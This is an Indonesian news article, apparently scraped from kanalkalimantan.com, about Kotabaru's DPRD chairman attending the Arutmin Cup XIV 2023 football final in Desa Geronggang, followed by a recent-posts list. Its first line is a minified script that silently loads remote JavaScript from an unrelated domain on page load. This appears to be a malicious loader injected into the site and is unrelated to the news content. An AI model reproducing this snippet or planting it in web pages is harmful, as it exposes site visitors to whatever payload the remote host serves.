(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
DPRD KOTABARU

Final Sepakbola di Desa Geronggang Dihadiri Ketua DPRD Kotabaru


KANALKALIMANTAN.COM, KOTABARU – Ketua DPRD Kotabaru, Syairi Mukhlis menghadiri final turnament sepakbola Arutmin Cup XIV 2023 yang berlangsung di lapangan sepakbola Desa Geronggang, Rabu (22/11/2023).

Berhadir pula jajaran Forkopimcam Kelumpang Tengah dan Utara, perwakilan PT Arutmin Indonesia Tambang Senakin dan mitra.

Pada pertandingan final yang digelar saat itu keluar sebagai pemenang adalah tim Generasi FC usai mengalahkan lawannya Arutmin FC.

Akhmad Syafi’I selaku ketua panitia turnamen mengatakan, event sepakbola Arutmin Cup XIV 2023 digelar untuk memeriahkan HUT PT Arutmin Indonesia ke-42, sekaligus ajang silaturahmi serta menjaring bibit-bibit atlet cabang olahraga utamanya adalah sepakbola.

“Tahun 2023 ini merupakan tahun ke-14 diselenggarakannya turnamen sepakbola Arutmin Cup XIV dan diikuti 16 Klub, yang terdiri dari 7 kecamatan dengan perebutan piala bergilir,” ujar dia.

Sementara Ketua DPRD Kotabaru, Syairi Mukhlis menyampaikan, kehadirannya di acara final sekaligus penutupan turnamen sepakbola tersebut sebagai apresiasi atas pertanggungjawaban PT Arutmin terhadap CSR bagi wilayah sekitar pertambangan.

“Saya sangat mengapresiasi atas kegiatan ini, dimana peran perusahaan cukup besar disini dalam rangka pergelaran olahraga di daerah Kelumpang Tengah tepatnya di Desa Geronggang yang mana kegiatan ini diikuti oleh 7 Kecamatan dan antusias warga juga luar biasa yang dilaksanakan selama 20 hari,” tutur dia.

Menurut dia, kegiatan tersebut berdampak baik dan luas terhadap kegiatan yang telah di lakukan oleh perusahaan, artinya Multiplier effect akan terjadi dan berdampak kepada tumbuhnya UMKM yang ada di sekitar kegiatan, akhirnya masyarakat bisa melakukan dan menjadi penggerak ekonomi serta semakin banyak orang berkunjung akhirnya para pelaku UMKM bisa kebanjiran rezeki.

Dia sangat mendukung dalam rangka menghidupkan perekonomian di sekitar kegiatan, selain itu juga kegiatan yang dilakukan perusahaan rutin setiap tahun dilaksanakan.

“Saya memberikan dukungan penuh terhadap kegiatan dan silaturahmi antara pengusaha yang berinvestasi dengan masyarakat serta dampak positif yang muncul akibat dari kegiatan yang dilaksanakan ini.

Atas nama pimpinan DPRD Kotabaru, saya ucapkan terimakasih dan apresiasi yang setinggi-tingginya atas terlaksananya turnamen sepakbola yang terselenggara ini,” pungkas dia. (kanalkalimantan.com/muhammad)

Reporter : muhammad
Editor : Dhani


Muhammad Andi

Recent Posts

Paman Birin Trophy VII 2024 Digelar 15 Hari di Murdjani

KANALKALIMANTAN.COM, BANJARBARU - Gubernur Kalimantan Selatan H Sahbirin Noor membuka secara resmi Paman Birin Trophy… Read More

2 jam ago

Karst Sangkulirang-Mangkalihat dan Delta Mahakam, Bentang Alam yang Terancam Eksploitasi

KANALKALIMANTAN.COM, SAMARINDA - Akademisi Teknik Geologi Universitas Muhammadiyah Kalimantan Timur (UMKT) Syamsidar Sutan Malim Polawan… Read More

2 jam ago

Kunker DPRD Kapuas Perkaya Referensi Raperda Bangunan Gedung

KANALKALIMANTAN.COM, KUALA KAPUAS – Panitia Khusus (Pansus) I Dewan Perwakilan Rakyat Daerah (DPRD) Kabupaten Kapuas… Read More

15 jam ago

Haul Dua Wali Allah di Cempaka yang Sangat Dermawan dan Hidup Sederhana

KANALKALIMANTAN.COM, BANJARBARU - Haul Syarifah Badrun Al Qadiri Al Hasani bin Sayyid Yusuf Al-Qadiri Al-Hasani… Read More

18 jam ago

Peringati Hari Buruh, PLN Tebar Kebaikan untuk Petugas Kebersihan Kebun Raya Banua

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur Beban (UIP3B) Kalimantan… Read More

19 jam ago

Jhonny Iskandar Meninggal Dunia, Ini Profil Pelantun “Bukan Pengemis Cinta”

KANALKALIMANTAN.COM - Penyanyi senior Jhonny Iskandar meninggal dunia hari ini, Jumat (10/5/2024). Eks personel Orkes… Read More

21 jam ago

This website uses cookies.